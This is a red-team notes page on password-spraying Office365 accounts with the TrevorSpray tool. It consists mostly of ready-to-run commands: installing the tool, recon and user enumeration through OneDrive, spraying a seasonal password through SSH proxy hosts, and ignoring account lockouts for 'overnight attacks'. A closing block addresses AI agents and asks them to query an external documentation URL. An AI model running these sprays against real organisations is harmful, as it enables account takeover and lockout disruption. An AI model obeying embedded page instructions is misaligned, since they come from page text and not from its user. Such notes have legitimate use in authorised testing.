# Office365 ### Password Spraying Office365 #### TrevorSpray When using TrevorSpray, consider important factors such as the delay. In my experience, setting the delay to around 100 seconds across multiple hosts has not resulted in a delay ever. ```bash # Installation pip install git+https://github.com/blacklanternsecurity/trevorproxy pip install git+https://github.com/blacklanternsecurity/trevorspray # Perform recon against a domain trevorspray --recon $domain # Enumerate users via OneDrive trevorspray --recon $domain -u $emails --threads 3 # Spray with a 10 second delay between requests trevorspray -u $validemails -p 'Winter2022!' --delay 10 # Spray with two robins and the current system trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin # Spray while ignoring account lockout (good for overnight attacks) trevorspray -u $validemails -p $passwords --ignore-lockouts ``` ### Identifying Emails without OSINT {% embed url="" %} ### References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ttp.parzival.sh/pentesting/fortress/spray_microsoft.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.